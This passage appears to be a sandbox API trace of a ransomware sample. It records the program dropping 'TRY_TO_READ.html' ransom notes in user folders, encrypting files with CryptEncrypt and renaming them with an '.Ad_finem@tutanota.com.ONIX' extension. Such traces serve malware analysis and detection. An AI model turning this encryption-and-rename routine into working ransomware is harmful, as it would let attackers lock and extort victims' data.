users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0128.866] GetProcessHeap () returned 0x410000 [0128.866] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449cf0 | out: hHeap=0x410000) returned 1 [0128.866] FindNextFileW (in: hFindFile=0x4e0d80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x47f00610, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x47f00610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x47f00610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0128.866] FindNextFileW (in: hFindFile=0x4e0d80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x47f00610, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x47f00610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x47f00610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0128.866] CloseHandle (hObject=0x3cc) returned 1 [0128.867] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0128.867] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x8, wMilliseconds=0xf5)) [0128.867] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0128.867] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0128.867] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0128.868] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local9c354ca09c354b444c.lock") returned 67 [0128.868] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0128.870] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.870] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.870] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b19b0 [0128.870] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51034410, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0dc0 [0128.870] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51034410, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.870] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0128.870] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.872] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0128.872] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.873] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1 [0128.873] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.875] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0128.875] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.877] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0128.877] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x51c [0128.877] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0128.878] LockFile (hFile=0x51c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1a918, nNumberOfBytesToLockHigh=0x0) returned 1 [0128.878] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.878] ReadFile (in: hFile=0x51c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0128.879] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.879] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.880] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0128.880] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0128.880] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", dwFileAttributes=0x80) returned 1 [0128.880] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 64 [0128.880] GetProcessHeap () returned 0x410000 [0128.880] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x431d68 [0128.880] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" [0128.880] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0128.880] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=108824) returned 1 [0128.880] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1a918 [0128.880] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0128.880] GetProcessHeap () returned 0x410000 [0128.880] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0128.880] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0128.880] WriteFile (in: hFile=0x51c, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0128.882] WriteFile (in: hFile=0x51c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0128.886] WriteFile (in: hFile=0x51c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0128.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a918) returned 0xf70048 [0128.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a918) returned 0xf8a968 [0128.887] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.887] ReadFile (in: hFile=0x51c, lpBuffer=0xf70048, nNumberOfBytesToRead=0x1a918, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x1a918, lpOverlapped=0x0) returned 1 [0128.894] UnlockFile (hFile=0x51c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1a918, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0128.894] CloseHandle (hObject=0x51c) returned 1 [0128.894] GetProcessHeap () returned 0x410000 [0128.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0128.894] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0128.899] GetProcessHeap () returned 0x410000 [0128.899] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0128.899] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0128.899] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.901] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0128.901] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.902] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8de8eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x126da7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0128.902] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x51c [0128.902] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0128.903] LockFile (hFile=0x51c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x126da7, nNumberOfBytesToLockHigh=0x0) returned 1 [0128.903] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.903] ReadFile (in: hFile=0x51c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0128.903] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.903] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.904] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0128.904] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0128.904] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 1 [0128.904] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 57 [0128.904] GetProcessHeap () returned 0x410000 [0128.904] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0128.904] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" [0128.904] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0128.904] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1207719) returned 1 [0128.904] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x126da7 [0128.904] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0128.904] GetProcessHeap () returned 0x410000 [0128.904] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0128.904] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0128.905] WriteFile (in: hFile=0x51c, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0128.907] WriteFile (in: hFile=0x51c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0128.908] WriteFile (in: hFile=0x51c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0128.909] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x126da7) returned 0x2b30020 [0128.909] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x126da7) returned 0x3680020 [0128.909] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.909] ReadFile (in: hFile=0x51c, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x126da7, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x126da7, lpOverlapped=0x0) returned 1 [0128.978] UnlockFile (hFile=0x51c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x126da7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0128.978] CloseHandle (hObject=0x51c) returned 1 [0128.979] GetProcessHeap () returned 0x410000 [0128.979] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0128.979] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0128.982] GetProcessHeap () returned 0x410000 [0128.982] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0128.982] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0128.982] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0128.982] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c [0128.984] FindNextFileW (in: hFindFile=0x4e0dc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0128.984] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 